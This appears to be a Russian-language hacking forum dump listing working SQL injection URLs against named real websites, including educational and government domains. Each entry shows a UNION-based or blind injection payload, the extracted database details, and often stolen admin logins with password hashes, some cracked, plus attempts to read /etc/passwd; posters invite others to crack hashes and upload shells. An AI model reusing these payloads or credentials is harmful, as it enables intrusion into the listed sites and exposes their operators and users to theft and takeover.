http://globalfsconsulting.info/display.php?page=-105+union+select+1,2,3,4,5,6,7,8,9,0/* Database Version: 4.1.22-log Database name: gfsc_db User name: gfsc_dbman@localhost
Database Version: 5.0.4-beta-nt Database name: dbwpcplanning User name: root@localhost *35A07C27A4C9E7065E275041F949FE07D5347D48 : root
Code: http://ombu.primorsky.ru/articles.php?id=-224+union+select+1,2,concat_ws(0x3a,version(),database(),users()),4,5,6,7-- database : 4.1.22-log name_database : ombu user mbu@localhost
Version: 5.0.67-log User: [email protected] Database: chefgarvin Админка: Login: Charles Pass: test Ток не заходит в админку, хз чего
Перчики дизайнерские -) Database Version: 5.0.67-community Database name: plethora_projects User name: plethora_work@localhost
http://www.contabilul.ro/index.php?pag=a&id=&s=&aid=-2317+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10/* Database Version: 5.0.26 Database name: contabilul User name: root@localhost http://www.contabilul.ro/index.php?pag=a&id=&s=&aid=-2317+union+select+1,2,3,4,5,load_file('/etc/passwd'),7,8,9,10/*
PR 5 http://www.wccs.edu/ http://www.wccs.edu/news/article.php?nid=-169+union+select+1,2,concat_ws(0x3a,user,Password),4,5,6,7,8+from+mysql.user-- root:*5AA32F1068AC50393758B94305EBA8978DFE3448
Database Version: 4.1.20 Database name: audioarc User name: audioarc@localhost Database Version: 4.1.14-standard Database name: cpspei_ca_-_cofp User name: cpspei@localhost Database Version: 4.1.22-standard-log Database name: nkcinter_sitemagixprod User name: nkcinter_nkcluye@localhost Database Version: 4.1.22-log Database name: locksafe User name: [email protected] Database Version: 4.1.25-Debian_mt1-log Database name: db7589_rcn User name: [email protected] Database Version: 4.0.26 Database name: avancso_org_gt User name: avancso@localhost ---------------------------------------------------------------------------------------------------- Database Version: 5.0.67-community Database name: yazdtile_tile User name: yazdtile_mahtab@localhost Login: admin Pass: e10adc3949ba59abbe56e057f20f883e: 123456 Database Version: 4.1.20-log Database name: shf_public User name: root@localhost Login: root Pass: 055990f63dab6a1b: ?? FILE_PRIV: Y Database Version: 5.0.67-community Database name: duatv_duatv User name: duatv_ntduatv@localhost Login: admin Pass: 21232f297a57a5a743894a0e4a801fc3: admin
ТИЦ: 50 PR: 3 database(): germes_site user(): germes_site@localhost version(): 5.0.75 TARGET: http://www.germesavto.com INJECTION: Админка: http://www.germesavto.com/login.php Структура БД: germes_site -admins (2) --login --pwd -files -news -ourcli -strings -strings2 -strings3 -texts В табице admins 1 единственная запись: admin:e101b2fe8c5dab5ca568675de0d2cb39 // ??? Хэш ХЗ. Кому интересно можно до конца добить)) Наверняка можно из админки залить шелл и вперед))
Вот еще одна... тока раскручивать ее лень. Кому надо, тот доделает. Делов на 15 мин)) вот админка: http://rvkstovo.com/admin/login.php
Database Version: 4.1.20 Database name: audioarc User name: audioarc@localhost Database Version: 4.1.14-standard Database name: cpspei_ca_-_cofp User name: cpspei@localhost
Code: http://pecom.ru/ru/news/index.php?id=2671+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,0- database : 5.0.45 name database : pecomru user : pecomru@localhost admin1: admin Root : okxfyfrs Admin : cc07f226b4a09bed098607093a2db221 http://www.pecom.ru/phpmyadmin/
HTML: http://www.tks.ch21.ru/zapchast/categ.php?id=1010&idcat=10&idc=9+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3-- Database Version: 4.1.22-log Database name: ch21ru63_tks User name: ch21ru63@localhost
Code: http://www.shuangliu.gov.cn/news/List.php?cid=-65+union+select+concat(username,0x3a,password),2+from+cms_admin+limit+0,1-- admin:addc316ef700c787aafe451a0a1192ba:826901 интересные таблички: user cms_admin cms_chatuser cms_jwuser cms_liveuser
http://www.aviso.ci/articleid.php?id=-69093+union+select+1,2,3,4,5,6,7,8,9,10-- version: 5.0.32-Debian_7etch8-log database: avisonewdb user: mnweb@localhost User: root Pass: FC470C8E58F926C8A5A5E3C18120FCB57040A2D4: topsyturvy FILE_PRIV: Y
HTML: http://www.tractorsales.ru/index.php?mod=1&parent_id=303678404&t_id=-1 god_login:questor adm_pass:21232f297a57a5a743894a0e4a801fc3 god_pass:21232f297a57a5a743894a0e4a801fc3 Если найдёте хэш...напишите в ЛС плиз(интересно)
HTML: http://www.ngo-monitor.org/articles.php?cat_id=17+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA,0x7873716C696E6A64656C,TABLE_ROWS)+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+20,1),0x7873716C696E6A656E64),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34-- Database Version: 4.1.21-log Database name: ngomonitor-1 User name: ngomonitor-1@localhost
http://frozenbass.ru/content.php?id=541+AND+ascii(substring(version(),1,1))=53-- version() = 5.* http://frozenbass.ru/content.php?id=541+AND+ascii(substring((select+table_name+from+information_schema.tables+limit+1,1),1,1))=67-- *кому не скучно - подбирайте дальше))
